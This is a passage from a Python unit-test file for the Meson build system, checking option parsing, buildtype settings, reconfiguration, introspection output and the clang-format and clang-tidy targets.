The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# Static libraries are not linkable with -l with msvc because meson installs them
# as .a files, which unix_args_to_native will not recognize since it expects
# libraries to use .lib as their extension. For a DLL the import library is
# installed as .lib. Thus for msvc this test needs to use shared libraries to
# test the path-resolving logic in the dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_installdir
self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set a wrong option for unknown subprojects or
# languages, because we have no control over which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting the same option a second time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError; it happens on CI for compilers that do not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
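# Summary of the buildtype <-> (debug, optimization) mapping exercised above:
#   plain          -> debug=False, optimization=0
#   debug          -> debug=True,  optimization=0
#   debugoptimized -> debug=True,  optimization=2
#   release        -> debug=False, optimization=3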
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Overwrite the stored version: an older one forces a reconfigure from
# scratch, while change_minor=True only bumps the patch level.
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
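# As the expected values above show, a target ID has the form
#   <hash prefix>@@<target name><suffix>
# where the hash prefix is derived from the target's subdirectory path; that
# is what keeps the ID stable across runs while remaining hard to guess.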
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
{
'descriptive_name': 'subsub',
'name': 'subsub',
'version': 'undefined'
},
{
'descriptive_name': 'subsubsub',
'name': 'subsubsub',
'version': 'undefined'
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" is not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
dummydir = os.path.join(testdir, 'dummydir.h')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
self.assertNotIn(dummydir, out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_buildoptions_cross_only(self):
testdir = os.path.join(self.unit_test_dir, '83 cross only introspect')
testfile = os.path.join(testdir, 'meson.build')
res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
optnames = [o['name'] for o in res]
self.assertIn('c_args', optnames)
self.assertNotIn('build.c_args', optnames)
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj, strict: bool = True):
for i in key_type_list:
if isinstance(i[1], (list, tuple)) and None in i[1]:
i = (i[0], tuple([x for x in i[1] if x is not None]))
if i[0] not in obj or obj[i[0]] is None:
continue
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
if strict:
for k in obj.keys():
found = False
for i in key_type_list:
if k == i[0]:
found = True
break
self.assertTrue(found, 'Key "{}" not in expected list'.format(k))
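# assertKeyTypes() verifies that every expected key which is present and
# non-None has the required type (a None entry in a type tuple marks the key
# as optional/nullable), and in strict mode also that the object carries no
# keys outside the expected list.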
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
('depends', list),
('workdir', (str, None)),
('priority', int),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
('choices', (list, None)),
('value', (str, int, bool, list)),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('extra_files', list),
('subproject', (str, None)),
('install_filename', (list, None)),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Match target ids to input and output files for ease of reference
src_to_id = {}
out_to_id = {}
for i in res['targets']:
# Dump each target record to stdout (debug aid for failures).
json.dump(i, sys.stdout)
print()
out_to_id.update({os.path.relpath(out, self.builddir): i['id']
for out in i['filename']})
for group in i['target_sources']:
src_to_id.update({os.path.relpath(src, testdir): i['id']
for src in group['sources']})
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]}
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertEqual(sorted(i['depends']),
sorted(deps_to_find[i['name']]))
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i, strict=False)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
